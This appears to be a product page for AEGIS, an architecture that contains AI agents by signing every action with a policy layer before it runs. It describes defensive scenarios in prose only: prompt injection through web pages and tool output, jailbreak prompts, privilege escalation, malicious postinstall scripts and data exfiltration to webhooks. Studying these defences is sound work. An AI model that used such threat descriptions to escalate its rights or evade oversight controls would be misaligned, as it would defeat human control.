Autonomous.
Controlled.
Governed.
AEGIS - Agent Engine, Governed Intent System. Every AI action is cryptographically signed before execution. No signature, no execution. Fully local. Fully air-gappable.
Three roles. One governed system.
AEGIS enforces strict separation between reasoning, policy, and execution. No role can bypass another.
Interprets user input and generates structured intents. Has zero system access - cannot execute anything directly.
Validates intent schemas, enforces whitelists, and cryptographically signs approved actions using HMAC-SHA256. The policy enforcement layer.
Verifies cryptographic signatures before executing any tool. Maintains an append-only audit log with hash-chain integrity.
Built for adversarial conditions.
Every assumption is adversarial. Internet content is untrusted by default. Execution requires valid policy signatures.
Every approved action carries a HMAC-SHA256 signature generated by Sentinel. Victor verifies this signature at the execution boundary - even for a single file read. Unsigned requests are rejected without exception. There is no override path.
Nonce-based replay prevention. Each intent carries a timestamp and unique nonce - reused intents are rejected.
Append-only audit log with hash-chain integrity. Every execution is recorded. Nothing can be modified or deleted.
No internet connectivity required. Internet content is treated as untrusted by default. The system is designed to run fully air-gapped.
Prompt injection attacks are structurally neutralized. Every action triggered by model output is independently re-signed by Sentinel at the execution boundary. Injected instructions embedded in web content, documents, or tool responses cannot self-authorize any action - the cryptographic policy layer operates independently of what the language model produces. Alignment of the model is not a security assumption.
What AEGIS governs in practice.
Ten scenarios where unsigned execution is simply not possible.
A development agent proposes a production deployment. Every step - git push, environment variable change, service restart - must carry a valid HMAC-SHA256 signature from Sentinel. No signature, no deployment. No exceptions, no override path.
An agent scrapes live competitor data for a report. Every HTTP request is signed before execution. Malicious content embedded in web pages cannot redirect the agent to unauthorized actions - the policy boundary holds regardless of what the page contains.
An AI assistant reads contracts and financial documents from a shared drive. Every file access is signed and audited. Sensitive directories trigger additional policy verification. No agent can read outside its policy scope - not even with a valid session.
A lead agent delegates subtasks to three specialized agents - research, drafting, and review. Every inter-agent message carries the delegating agent's signature. No agent can escalate its own permissions or act outside its assigned scope.
A malicious website embeds hidden instructions designed to hijack agent behavior mid-session. Every action triggered by model output is re-signed by Sentinel at the execution boundary. Injected text cannot self-authorize any action - the policy layer is independent of the language model's output.
A communication agent drafts and queues outbound messages. Every send action requires a fresh HMAC signature from Sentinel. A compromised model output cannot autonomously dispatch any communication - the agent cannot self-authorize transmission regardless of what the model generates.
A tool-use chain attempts to bootstrap elevated permissions mid-execution. Each privilege boundary is a signed checkpoint. No agent can grant itself access beyond its initial policy grant - delegation to a subagent does not inherit escalated rights. The scope is set at session creation and cannot be extended at runtime.
An agent installing a package dependency encounters a malicious postinstall script attempting to execute arbitrary code. Every subprocess spawn is verified against the execution policy before it runs. Unsigned subprocess execution is blocked at the OS boundary regardless of the package installer.
An analytics agent processing sensitive customer records attempts to write output to an external webhook. The outbound network action is part of the execution graph and requires Sentinel approval. Unapproved destinations are blocked regardless of data classification - the agent cannot route data outside its approved action set.
A crafted adversarial prompt attempts to bypass the model's safety alignment and issue unauthorized system commands. Even if the language model produces a seemingly compliant response, Victor validates every action request independently against the signed policy. The architecture does not assume the model stays aligned - the execution layer is the last and decisive checkpoint.
"AEGIS is not open source. It is not a framework you install. It is a governed execution architecture - for those who know what that means."
The separation of reasoning, policy, and execution is not a convention - it is enforced cryptographically. Lena can propose, Sentinel can approve, Victor can act. No role crosses into another's domain.